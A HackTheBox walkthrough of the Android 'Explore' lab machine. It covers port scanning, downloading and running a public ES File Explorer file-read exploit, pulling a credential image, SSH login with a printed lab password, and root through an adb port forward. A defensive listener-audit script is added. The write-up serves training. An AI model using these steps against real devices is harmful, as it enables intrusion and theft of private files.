Explore HackTheBox WalkThrough
This is the Explore HackTheBox machine walkthrough. In this writeup, I demonstrate step by step how I rooted the Explore HackTheBox machine. Before starting, let us learn something about this box. It is an Android OS box with IP address 10.10.10.247 and difficulty level Easy, assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Explore machine by pinging its IP 10.10.10.247. If all goes well, it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further. For example, it helps in banner grabbing the various services running on different ports, and sometimes it helps in vulnerability assessment as well. I used nmap for this task, and the result is given below:
Scanning
$ sudo nmap -sT -T4 -sV -p- -oN explore-all-tcp.nmap --min-rate=1000 10.10.10.247

The full TCP port scan revealed 4 open ports: an SSH server on 2222, ES File Explorer on 42135, a Bukkit JSONAPI web server on 59777, and an unknown service running on port 33483. A quick search for "ES File explorer exploit" revealed that ES File Explorer on Android is vulnerable to an Arbitrary File Read vulnerability. For more info about this vulnerability check this link. You can either use the previous link to download the exploit code or use this link; they are all the same. Here is the snippet of the exploit.

Using this exploit I could read many files on the Explore machine. When I tried to list all the pics on the Android phone, I found a pic named creds.jpg. As its name suggests, it may contain some type of credential. Then I tried to download this pic using the exploit itself, but it gave me the error "You need to provide full path of the file". After trying a few more times without being able to download it, I tried to access the file using a web browser, and the file could be accessed that way. Inside that file [pic] there is a handwritten credential. I followed the given steps to access the file.
Downloading & Executing Exploit
$ wget https://dl.packetstormsecurity.net/2106-exploits/esfileexplorer41974-fileread.txt
$ mv esfileexplorer41974-fileread.txt exploit.py
$ python3 exploit.py listPics 10.10.10.247
$ curl http://10.10.10.247:59777/storage/emulated/0/DCIM/creds.jpg -O
$ firefox creds.jpg


The extracted credential from the file is kristi : Kr1sT!5h@Rp3xPl0r3!
Getting User Shell
Let us use the grabbed credential to log in to Kristi’s SSH account.
$ ssh [email protected] -p 2222
~ Kr1sT!5h@Rp3xPl0r3!
$ whoami && id

We are successfully logged in to kristi’s SSH account. Let us capture the user flag.
Capture User Flag
$ cat /sdcard/user.txt

Privilege Escalation
To escalate privileges to root, we first have to find a privilege escalation vector. We can use a post-exploitation enumeration script for this task. Check this link if you need more information about a bunch of post-exploitation tools.
Finding PrivEsc Vector
$ ss -lnpt
The command revealed that port 5555 is open and listening locally.

Then I checked which process is running on this port and which user is executing it. If it is executed by root or some well-known user, then we should definitely have a look at it. Generally, on Android, port 5555 is used by adb, so I checked the running processes, and this revealed that adb is being executed by user shell.
$ ps -ef | grep -i adb

A quick search for "adb privilege escalation" gave this ppt. According to this ppt, we can perform privilege escalation only when we are logged in as user shell. But currently we are logged in as user u0_a76. We somehow have to log in as user shell to perform privilege escalation. When I logged in as user shell, I could perform privilege escalation very easily. So here our potential PrivEsc vector is privilege escalation by exploiting adb [Android Debug Bridge].
Local Port Forwarding
Since the adbd service is running locally as user shell, we can access this service from our Kali machine by forwarding port 5555 to it. Therefore, to access adb, I forwarded port 5555 to my Kali machine through local port forwarding. Now we can see the forwarded port on our Kali machine using the $ ss -lnpt command.
$ ssh -L 5555:127.0.0.1:5555 [email protected] -p 2222
Password authentication
Password: Kr1sT!5h@Rp3xPl0r3!
$ ss -lnpt
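
Seen from the defender's side, the same `ss -lnpt` listing can be audited for the exposure used here: an adbd listener on port 5555 is reachable through an SSH forward even when it is bound to loopback. The following is an added example, not part of the original walkthrough; the function names, the sample listing and port 40001 are constructed for illustration.

```python
import ipaddress

# Constructed sample of `ss -lnpt` output, modelled on the ports named in this
# walkthrough. Port 40001, the PID and the process name are illustrative only.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port        Peer Address:Port
LISTEN  0       50      *:2222                    *:*      users:(("sshd",pid=3301,fd=8))
LISTEN  0       4       127.0.0.1:5555            0.0.0.0:*
LISTEN  0       10      [::ffff:127.0.0.1]:40001  *:*
LISTEN  0       50      [::]:59777                [::]:*
LISTEN  0       10      0.0.0.0:42135             0.0.0.0:*
"""

ADB_TCP_PORT = 5555  # port the walkthrough identifies as adb over TCP


def split_endpoint(endpoint):
    """Split an ss 'Local Address:Port' value into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    host = host.strip("[]").split("%")[0]  # drop brackets and any %iface scope
    return host, int(port)


def is_loopback(host):
    """True for 127.0.0.0/8, ::1 and IPv4-mapped loopback; '*' is a wildcard."""
    if host in ("*", ""):
        return False
    addr = ipaddress.ip_address(host)
    mapped = getattr(addr, "ipv4_mapped", None)
    return (mapped or addr).is_loopback


def audit_listeners(ss_output):
    """Return (port, bind_host, finding) for each LISTEN row worth reviewing."""
    findings = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue  # header or non-listening row
        host, port = split_endpoint(cols[3])
        local = is_loopback(host)
        if port == ADB_TCP_PORT:
            # A loopback bind does not protect adbd: any local user, or an
            # SSH port forward from a remote login, can still connect to it.
            scope = "loopback" if local else "all interfaces"
            findings.append((port, host, f"adb over TCP on {scope}"))
        elif not local:
            findings.append((port, host, "reachable from the network"))
    return findings
```

Running `audit_listeners(SAMPLE_SS)` flags 2222, 5555, 59777 and 42135 and leaves the loopback-only listener on 40001 unreported.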

Getting Root Shell
Once we can access the adb service locally, we can easily connect to it and perform privilege escalation. To perform privilege escalation I followed the given steps.
$ adb connect 127.0.0.1
$ adb devices
$ adb shell
$ su
# whoami && id

We have successfully got a root shell. Let us capture the root flag.
Capture Root Flag
# find / -user "root" -type f -name "root.txt" 2>/dev/null
# cat /data/root.txt

This was how I rooted the Explore HackTheBox machine. I learnt a lot from this challenge, and I hope you have also learnt some new things. Thanks for reading this walkthrough. For any queries or suggestions about the walkthrough, feel free to write to us at [email protected].